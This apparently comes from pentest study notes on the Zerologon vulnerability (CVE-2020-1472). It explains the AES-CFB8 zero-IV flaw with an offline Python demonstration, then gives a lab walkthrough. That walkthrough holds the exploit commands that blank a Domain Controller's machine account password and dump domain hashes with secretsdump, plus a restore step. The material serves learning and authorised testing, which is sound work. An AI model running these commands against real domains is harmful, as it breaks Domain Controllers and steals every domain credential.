Zerologon
Overview
The Zerologon vulnerability (CVE-2020-1472) lets an unauthenticated attacker on the network subvert the authentication handshake of Microsoft's Netlogon Remote Protocol (MS-NRPC) and take over the Domain Controller.
The bug is cryptographic: Netlogon computes its credentials with AES-CFB8 using a fixed all-zero IV, so for roughly 1 in 256 session keys an all-zero client challenge and client credential are accepted. After a few hundred attempts (each with a fresh server challenge, hence a fresh session key) the attacker is authenticated as the DC's own machine account without knowing its password, and can then call NetrServerPasswordSet2 to set that machine account password to empty. That is why, afterwards, we can authenticate to the DC with no password at all.
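To make the "1 in 256" claim concrete, here is an added example (not part of this page and not code from the tester or exploit scripts) that reimplements MS-NRPC's ComputeNetlogonCredential in pure Python and shows why an all-zero challenge yields an all-zero credential for about 1/256 of session keys. It uses real AES if the cryptography package is installed and otherwise falls back to a SHA-256 keyed stand-in for the AES block function (an assumption: any pseudorandom 16-byte block function shows the same CFB8 weakness). Every key value is constructed for the demo; nothing here touches the network.

```python
import hashlib
from typing import Optional

# Prefer real AES-128; fall back to a keyed SHA-256 stand-in (assumption for the demo).
try:
    from cryptography.hazmat.primitives.ciphers import Cipher, algorithms, modes

    def block_encrypt(key: bytes, block: bytes) -> bytes:
        """One AES-128 block encryption, the primitive CFB8 is built on."""
        return Cipher(algorithms.AES(key), modes.ECB()).encryptor().update(block)
except ImportError:
    def block_encrypt(key: bytes, block: bytes) -> bytes:
        """Stand-in block function: SHA-256(key || block) truncated to 16 bytes."""
        return hashlib.sha256(key + block).digest()[:16]


def cfb8_encrypt(key: bytes, iv: bytes, data: bytes) -> bytes:
    """CFB8: each plaintext byte is XORed with the first byte of E_k(shift register),
    then the resulting ciphertext byte is shifted into the register."""
    register = bytearray(iv)
    out = bytearray()
    for p in data:
        c = p ^ block_encrypt(key, bytes(register))[0]
        out.append(c)
        register = register[1:] + bytes([c])
    return bytes(out)


def compute_netlogon_credential(session_key: bytes, challenge: bytes) -> bytes:
    """MS-NRPC ComputeNetlogonCredential (AES variant): AES-CFB8 over the 8-byte
    challenge with a fixed all-zero IV. The fixed zero IV is the bug."""
    assert len(challenge) == 8
    return cfb8_encrypt(session_key, bytes(16), challenge)


ZERO_CHALLENGE = bytes(8)


def zero_credential_accepted(session_key: bytes) -> bool:
    """A Zerologon attempt sends ClientChallenge = 0 and ClientCredential = 0.
    The DC accepts it when its own computation of the credential is also all zeros."""
    return compute_netlogon_credential(session_key, ZERO_CHALLENGE) == bytes(8)


def find_vulnerable_key(limit: int = 1 << 16) -> Optional[bytes]:
    """Search constructed keys k = 0, 1, 2, ... for one that accepts the zero credential.
    With a zero IV and zero input the register stays all-zero as long as the
    ciphertext bytes are zero, so acceptance happens exactly when the first byte
    of E_k(0^16) is 0x00, i.e. with probability 1/256 per key."""
    for i in range(limit):
        key = i.to_bytes(16, "big")
        if block_encrypt(key, bytes(16))[0] == 0:
            return key
    return None


def estimate_success_rate(n_keys: int) -> float:
    """Fraction of constructed keys 0..n_keys-1 that accept the zero credential (about 1/256)."""
    hits = sum(zero_credential_accepted(i.to_bytes(16, "big")) for i in range(n_keys))
    return hits / n_keys


def success_probability(attempts: int) -> float:
    """Probability that at least one of `attempts` handshakes, each with a fresh
    session key (the server challenge changes every time), hits a vulnerable key."""
    return 1 - (255 / 256) ** attempts


if __name__ == "__main__":
    k = find_vulnerable_key()
    print("vulnerable key:", k.hex())
    print("credential for zero challenge:", compute_netlogon_credential(k, ZERO_CHALLENGE).hex())
    print("empirical rate over 4096 keys:", estimate_success_rate(4096))
    print("P(success) after 256 tries: %.3f, after 2000 tries: %.4f"
          % (success_probability(256), success_probability(2000)))
```

The numbers explain the behaviour of the real tooling: one handshake succeeds with probability 1/256, 256 attempts give roughly a 63% chance, and the tester and exploit scripts loop up to 2000 times, which makes success practically certain. Note that the attacker never learns the session key; it only needs the DC to land on one whose first keystream byte is zero, and the all-zero client credential then matches.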
Exploiting it sets the DC machine account password to empty, which desynchronises the DC from the rest of Active Directory and can BREAK the Domain Controller (replication, Kerberos and DNS all depend on that account), so it shouldn't be run on a real engagement unless the client has explicitly approved it and you restore the original password immediately afterwards (see the restore step below).
Now here's how to do it :D
Zerologon Attack
First, check whether the Domain Controller is vulnerable with the SecuraBV tester script (arguments are the DC's NetBIOS name and its IP); it only reports success if the DC accepted the all-zero credential, and it does not change the machine account password:
./zerologon_tester.py PNPT-DC 192.168.1.129
Exploit the vulnerability with dirkjanm's script (this is the step that sets the DC machine account password to empty), then dump the domain hashes over DRSUAPI authenticating as the machine account with an empty password (press Enter at the password prompt, or pass -no-pass):
python3 cve-2020-1472-exploit.py PNPT-DC 192.168.1.129
impacket-secretsdump -just-dc -no-pass PNPT/PNPT-DC\$@192.168.1.129
Restore the Domain Controller's original machine account password (mandatory, otherwise the DC stays broken). The -hexpass value is the plain_password_hex of the $MACHINE.ACC entry, which secretsdump prints when run against the DC with the Administrator NTLM hash from the dump above and without -just-dc, so that LSA secrets are included:
python3 restorepassword.py PNPT/PNPT-DC@PNPT-DC -target-ip 192.168.1.129 -hexpass XXX
